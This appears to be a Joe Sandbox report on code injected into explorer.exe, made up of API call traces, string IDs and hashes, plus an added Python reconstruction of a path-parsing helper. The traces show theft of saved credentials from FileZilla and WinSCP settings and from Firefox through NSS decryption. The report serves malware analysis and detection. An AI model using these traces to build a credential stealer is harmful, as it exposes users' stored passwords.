                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 027536C0
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,027537A8), ref: 027536F5
                                                                                                                                          • Part of subcall function 02751C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02751CC0
                                                                                                                                          • Part of subcall function 02751C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02751CDA
                                                                                                                                          • Part of subcall function 02751C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02751CE6
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,027537A8), ref: 02753707
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                                        • String ID: File
                                                                                                                                        • API String ID: 3915112439-749574446
                                                                                                                                        • Opcode ID: 79b44400c3221957b2e800844e7033d3b202113bdac8c51b3f78b97bc117e75b
                                                                                                                                        • Instruction ID: 448d308be16d556d318f87ed39ce27eab9b9019b254a9953a63ea0d3bfbbbe07
                                                                                                                                        • Opcode Fuzzy Hash: 79b44400c3221957b2e800844e7033d3b202113bdac8c51b3f78b97bc117e75b
                                                                                                                                        • Instruction Fuzzy Hash: 81619F70A44311AFDB119F20CC88F2BBBE9EF847A5F04492CFD46A62A0DBB5D9548F51
                                                                                                                                        APIs
                                                                                                                                        • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 027A4502
                                                                                                                                        • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 027A475F
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 027A4803
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp$memcpy
                                                                                                                                        • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                        • API String ID: 231171946-1096842476
                                                                                                                                        • Opcode ID: bc17aa7b42fdac72c92bd5d104c2c36261e965e27386fce58d328d03a647acd6
                                                                                                                                        • Instruction ID: ef5929a2f1edc2b3d245a6c44a5ad52ae9241d49bcf3fb96edc1090622586f38
                                                                                                                                        • Opcode Fuzzy Hash: bc17aa7b42fdac72c92bd5d104c2c36261e965e27386fce58d328d03a647acd6
                                                                                                                                        • Instruction Fuzzy Hash: F9C1F171A083929BDB35CF2884B477BB7E2AFC5338F04062EE8D697241D7A6D445CB42
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02756AAA: memset.NTDLL ref: 02756AC5
                                                                                                                                        • memset.NTDLL ref: 02775F53
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                        • API String ID: 2221118986-594550510
                                                                                                                                        • Opcode ID: 9fc1b8364bd1eda483a326e9c7ef932992c3cad32f76cd16e36a4edc2bd915d7
                                                                                                                                        • Instruction ID: a64f52fdff1c5339fc5e9511beb5240e6237ba6252f8a019e5411bf6409d1827
                                                                                                                                        • Opcode Fuzzy Hash: 9fc1b8364bd1eda483a326e9c7ef932992c3cad32f76cd16e36a4edc2bd915d7
                                                                                                                                        • Instruction Fuzzy Hash: 5AC19D70A08B029FCB15DF25C494A2BB7E6BFC8714F04892DF89597245EB31E952CF92
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.COMBASE(027A62B0,00000000,00000001,027A62A0,?), ref: 0275445F
                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 027544AA
                                                                                                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0275456E
                                                                                                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 0275457D
                                                                                                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 0275458C
                                                                                                                                          • Part of subcall function 027511E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,027546E3), ref: 027511ED
                                                                                                                                          • Part of subcall function 027511E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0275120F
                                                                                                                                          • Part of subcall function 027511E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02751231
                                                                                                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 027545BE
                                                                                                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 027545CD
                                                                                                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 02754657
                                                                                                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 02754679
                                                                                                                                        • lstrcmpiW.KERNEL32(User,?), ref: 0275469F
                                                                                                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 027546C5
                                                                                                                                        • wsprintfW.USER32 ref: 0275471E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                                        • API String ID: 2230072276-1234691226
                                                                                                                                        • Opcode ID: 7af4061f37b4626563e72175882b5c37bc1470b7f1c640ba0523b179e66b7f2e
                                                                                                                                        • Instruction ID: d7096533367db9e29c03d99d08192efbd9febc6116427f93a020df4ed8a251c8
                                                                                                                                        • Opcode Fuzzy Hash: 7af4061f37b4626563e72175882b5c37bc1470b7f1c640ba0523b179e66b7f2e
                                                                                                                                        • Instruction Fuzzy Hash: C6B1F771204312AFD700DF64C894E6ABBF9EFC9759F00895CFA598B160DB71E846CB52
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                          • Part of subcall function 02751090: lstrlenW.KERNEL32(?,?,00000000,027517E5), ref: 02751097
                                                                                                                                          • Part of subcall function 02751090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 027510A8
                                                                                                                                          • Part of subcall function 027519B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02752CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027519C4
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 02752503
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0275250A
                                                                                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 02752563
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 02752570
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 02752591
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0275259E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 027525AB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 027525B8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 027525C5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 027525D2
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 027525DF
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(?,?,?,?,00000000,02752783), ref: 0275192B
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02752783), ref: 02751930
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,?), ref: 02751946
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,00000000), ref: 0275194A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                                        • API String ID: 3366569387-3272982511
                                                                                                                                        • Opcode ID: 86ffe3480d4e7b072e72aadcf369c886ffdac472fbd4a3508bd40c787149e0f8
                                                                                                                                        • Instruction ID: e772a9e6bbf7be4294b35a26eb7287527050a02d6407f9d84fec61b9f3651c9f
                                                                                                                                        • Opcode Fuzzy Hash: 86ffe3480d4e7b072e72aadcf369c886ffdac472fbd4a3508bd40c787149e0f8
                                                                                                                                        • Instruction Fuzzy Hash: 55410731E413618BDB15AF3558ACA2FBBDADFC5651744452EEC49A3241DBB48C01CF91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02755BF5: memset.NTDLL ref: 02755C07
                                                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 027560E1
                                                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 027560EC
                                                                                                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 02756113
                                                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0275618E
                                                                                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 027561B5
                                                                                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 027561C1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _alldiv$_allrem$memset
                                                                                                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                                        • API String ID: 2557048445-1989508764
                                                                                                                                        • Opcode ID: 2c4ce2acafae57abd3fabe19e3c55f067538505d8eb4e7891d4984004e04002b
                                                                                                                                        • Instruction ID: 8cd19b252f91b5e55a721c25da0920ac9ef5544046a12e892d0f874fa89b050e
                                                                                                                                        • Opcode Fuzzy Hash: 2c4ce2acafae57abd3fabe19e3c55f067538505d8eb4e7891d4984004e04002b
                                                                                                                                        • Instruction Fuzzy Hash: 95B180B19083619BD7269E24CC88B3BFFD9EF81304FD40649FC86A61D0E7E1C551CA91
                                                                                                                                        APIs
                                                                                                                                        • memcmp.NTDLL(027A637A,BINARY,00000007), ref: 0276D324
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                                        • API String ID: 1475443563-3683840195
                                                                                                                                        • Opcode ID: 281471e501a553e70773be24996ef10ea5fd6d5d5e6ae6f5a43ea34acf8e06fd
                                                                                                                                        • Instruction ID: 4d478d8deb07c8f9acfce7944a9b77061afe1b6df68f0340a3e6bcb1f3e7e6f3
                                                                                                                                        • Opcode Fuzzy Hash: 281471e501a553e70773be24996ef10ea5fd6d5d5e6ae6f5a43ea34acf8e06fd
                                                                                                                                        • Instruction Fuzzy Hash: A9510471A14310EBE729CF65CC48B7BBBE7AB85210F090969FC569B240E370EC05CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 027519E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
                                                                                                                                          • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
                                                                                                                                          • Part of subcall function 027519E5: RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
                                                                                                                                          • Part of subcall function 0275482C: lstrlenW.KERNEL32(?), ref: 02754845
                                                                                                                                          • Part of subcall function 0275482C: lstrlenW.KERNEL32(?), ref: 0275488F
                                                                                                                                          • Part of subcall function 0275482C: lstrlenW.KERNEL32(?), ref: 02754897
                                                                                                                                        • wsprintfW.USER32 ref: 027549A7
                                                                                                                                        • wsprintfW.USER32 ref: 027549B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                                        • API String ID: 2889301010-4273187114
                                                                                                                                        • Opcode ID: 084f457141db22ffb1187e7de7a7f87676a81b4f154631b65445bff0f4c5de29
                                                                                                                                        • Instruction ID: f755d673fab57e1090602cd5f513ea6c0e9c1e41dd092451aa273f6b589bcce6
                                                                                                                                        • Opcode Fuzzy Hash: 084f457141db22ffb1187e7de7a7f87676a81b4f154631b65445bff0f4c5de29
                                                                                                                                        • Instruction Fuzzy Hash: 1E315860B083245BDB11AF65CC2692BFADEFFC5648B094A1DF80593240DBF2DC418BA1
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 0275FB32
                                                                                                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0275FB4D
                                                                                                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0275FB60
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0275FB95
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                                                                                        • API String ID: 3510742995-3408036318
                                                                                                                                        • Opcode ID: 71b03420e7739b4feab9a55570d141835f83cccbbfec7fc31eed7d09dc40a671
                                                                                                                                        • Instruction ID: e8dbf6d393776dfb0a372dbae5819be3e162e672823f4921acbe1e52d4313084
                                                                                                                                        • Opcode Fuzzy Hash: 71b03420e7739b4feab9a55570d141835f83cccbbfec7fc31eed7d09dc40a671
                                                                                                                                        • Instruction Fuzzy Hash: FDD1D3B16083518FDB15DF28C894B2AFBE6AF86314F08456DEC998B391D7B4D805CB53
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: %$-x0$NaN
                                                                                                                                        • API String ID: 0-62881354
                                                                                                                                        • Opcode ID: 7049a20814f9db024332af0ed743570b45b0198c6335cca04a79c901589cf7dd
                                                                                                                                        • Instruction ID: fd5ef80cdf4e6f0b6d6f3a6023565d0f225b129cc67e066db7a88c7c94e075c2
                                                                                                                                        • Opcode Fuzzy Hash: 7049a20814f9db024332af0ed743570b45b0198c6335cca04a79c901589cf7dd
                                                                                                                                        • Instruction Fuzzy Hash: BDD1E530A0C3A18FD72A8E29849472BFBE6AFC6208F54495DFCC597391D7E5C945CB82
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 04f62c294c565bed4aabe5d186b712de92f4a5967747d7a12dddd5991d9035f7
                                                                                                                                        • Instruction ID: 3e5393828b28f81b030635ae0c11146c8ca1e61e3a113623b33490e3daadb6c9
                                                                                                                                        • Opcode Fuzzy Hash: 04f62c294c565bed4aabe5d186b712de92f4a5967747d7a12dddd5991d9035f7
                                                                                                                                        • Instruction Fuzzy Hash: 98E1E530A083A18BD72A8E28C45473BFBE6AFC6218F18495DECC597391D7E5C945CB92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 18c4dd1572a872440aa720b3dd04794a7ccf503e3af3d0e2573ae7331772e01e
                                                                                                                                        • Instruction ID: 74011286b7e9bf79bf306ea310433640220cec55f550cee7b76cacb99041256b
                                                                                                                                        • Opcode Fuzzy Hash: 18c4dd1572a872440aa720b3dd04794a7ccf503e3af3d0e2573ae7331772e01e
                                                                                                                                        • Instruction Fuzzy Hash: B5E1E330A083A18BD72A8E29C49472BFBE6AFC6208F54495DFCC597391D7F1C945CB92
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 913ee9661e4b760fa96d917b8dced89e32ddcf218ec727e0ec7b0408f2906a31
                                                                                                                                        • Instruction ID: 0dc5b4de0b258d9db097d651eed529abc6b50f646d82267ef9a9678d182dc889
                                                                                                                                        • Opcode Fuzzy Hash: 913ee9661e4b760fa96d917b8dced89e32ddcf218ec727e0ec7b0408f2906a31
                                                                                                                                        • Instruction Fuzzy Hash: F1E1D470A083A18BD7298E29C49472BFBE6AFC6208F18495DFCC597391D7F5C945CB82
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 0-3447725786
                                                                                                                                        • Opcode ID: 7bc033775d0738c64a11a7a6eacce9012f5791f718c9cadad124cc2e086e9921
                                                                                                                                        • Instruction ID: 7f4a37cc30c7bd6b2b2accf919742e10e0ce218b08b17f837438c3e79e7d3bea
                                                                                                                                        • Opcode Fuzzy Hash: 7bc033775d0738c64a11a7a6eacce9012f5791f718c9cadad124cc2e086e9921
                                                                                                                                        • Instruction Fuzzy Hash: C6E1E470A083A18FD7298E29C49472BFBE5AFC6208F14495DFCC597391D7E5C945CB82
                                                                                                                                        APIs
                                                                                                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0275720E
                                                                                                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 02757226
                                                                                                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0275727B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _aulldvrm$_aullrem
                                                                                                                                        • String ID: -x0$NaN
                                                                                                                                        • API String ID: 105165338-3447725786
                                                                                                                                        • Opcode ID: 00107a476863af593f3ff0a456b15743a60ccb00621aa4fc888b74cf48dfc826
                                                                                                                                        • Instruction ID: 4e4eb6caecec5081714e49b9b62e260e83df97150d73736eecd24aa608be728b
                                                                                                                                        • Opcode Fuzzy Hash: 00107a476863af593f3ff0a456b15743a60ccb00621aa4fc888b74cf48dfc826
                                                                                                                                        • Instruction Fuzzy Hash: B2D1F530A0C3A18FD72A8E29849472BFBE6AFC6208F14495DFCC597391D7E5C945CB82

APIs
• _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 02758AAD
• _allmul.NTDLL(?,?,0000000A,00000000), ref: 02758B66
• _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 02758C9B
• _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 02758CAE
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: _allmul$_alldvrm
• String ID: .
• API String ID: 115548886-248832578
• Opcode ID: 75900410a1e09c906492b99e1aa9ee0c83b87cbc27929d8f93ee48125278c761
• Instruction ID: a6d062ebe18857f8d8ff441b97dbcec808c80acb07cee382bfe0d4d265d8c8ce
• Opcode Fuzzy Hash: 75900410a1e09c906492b99e1aa9ee0c83b87cbc27929d8f93ee48125278c761
• Instruction Fuzzy Hash: 34D1F3B190E7A98BC3108F19848033AFBE1BFC9314F04499EFAD596281D7F18985CB87

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: memset
• String ID: ,$7$9
• API String ID: 2221118986-1653249994
• Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
• Instruction ID: 5b3a439b70d7fa0f227201c440d8b30989b058f6271083fc67341786bc9c3da5
• Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
• Instruction Fuzzy Hash: 8231AD715083449FD731DF60D844B8FBBE9AFC5350F00892EE98997250EB719548CBA3

APIs
• lstrlenW.KERNEL32(00000000,00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751BCC
• StrStrIW.SHLWAPI(00000000,.exe,?,02752E75,PathToExe,00000000,00000000), ref: 02751BF0
• StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02752E75,PathToExe,00000000,00000000), ref: 02751C05
• lstrlenW.KERNEL32(00000000,?,02752E75,PathToExe,00000000,00000000), ref: 02751C1C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: lstrlen
• String ID: .exe
• API String ID: 1659193697-4119554291
• Opcode ID: 36f7453379d52c3c7214a145c34259a9a5a34326a299b9341b477b2638a1100d
• Instruction ID: 12ab2800324c11e906a81ac6df54b59c289e6634ae81b6f4c5c2d559a56283ff
• Opcode Fuzzy Hash: 36f7453379d52c3c7214a145c34259a9a5a34326a299b9341b477b2638a1100d
• Instruction Fuzzy Hash: AFF0C8307516305AE7245F349C44BBBA799EF413527559C29E94AC3190F7F18881C759
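
The "PathToExe" record above only lists the calls the injected code makes (lstrlenW, StrStrIW with ".exe", StrRChrIW with 0x5C, lstrlenW). The following is an added Python reconstruction of what that call sequence computes; it is not code from the Joe Sandbox report or from the sample, the reading of the trace as "split an .exe path at its last backslash" is an assumption, and the sample paths are constructed. It also shows two semantics worth remembering when writing detections on such strings: StrStrIW is a case-insensitive substring test, not a suffix test, so ".exe.bak" also matches.

```python
# Added example (not code from the Joe Sandbox report or from the sample): a Python
# reconstruction of the "PathToExe" helper as the traced call sequence suggests it behaves.
# Interpretation of the trace is an assumption; only the API names and arguments are from the page.

# Constructed sample paths, not taken from the analysed sample.
SAMPLE_PATHS = [
    r"C:\Users\user\AppData\Roaming\abcd.exe",
    r"C:\Windows\explorer.EXE",
    "notepad.exe",
    r"C:\Program Files\tool\driver.sys",
    r"C:\tmp\archive.exe.bak",
]


def str_str_i(haystack, needle):
    """StrStrIW: case-insensitive *substring* search (not a suffix test).
    Returns the match offset or None."""
    idx = haystack.lower().find(needle.lower())
    return None if idx < 0 else idx


def str_rchr_i(s, ch, end=None):
    """StrRChrIW(pszStart, pszEnd, wMatch): last case-insensitive occurrence of ch
    in s, or in s[:end] when pszEnd is given (the trace passes NULL, i.e. the whole string)."""
    hay = s if end is None else s[:end]
    idx = hay.lower().rfind(ch.lower())
    return None if idx < 0 else idx


def split_exe_path(path):
    """Mirror the traced sequence: lstrlenW -> StrStrIW(path, ".exe")
    -> StrRChrIW(path, NULL, 0x5C) -> lstrlenW on the tail.
    Returns (directory, filename) for a path that contains ".exe", else None."""
    if len(path) == 0:                        # first lstrlenW: empty input
        return None
    if str_str_i(path, ".exe") is None:       # StrStrIW with the ".exe" literal
        return None
    sep = str_rchr_i(path, "\\")              # StrRChrIW with wMatch = 0x5C (backslash)
    if sep is None:
        directory, filename = "", path        # bare file name, no directory part
    else:
        directory, filename = path[:sep], path[sep + 1:]
    if len(filename) == 0:                    # second lstrlenW: path ended in a backslash
        return None
    return directory, filename


def classify_paths(paths=SAMPLE_PATHS):
    """Run the reconstruction over the constructed samples."""
    return {p: split_exe_path(p) for p in paths}
```

Running classify_paths() over the constructed list returns a (directory, filename) pair for four of the five paths; the ".sys" path is rejected and "archive.exe.bak" is accepted because of the substring semantics. When pivoting on this function across samples, the API String ID (1659193697-4119554291) rather than the reconstruction is the stable key.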

APIs
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 02752127
• _alldiv.NTDLL(?,?,00989680,00000000), ref: 0275213A
• wsprintfA.USER32 ref: 0275214F
Strings
Memory Dump Source
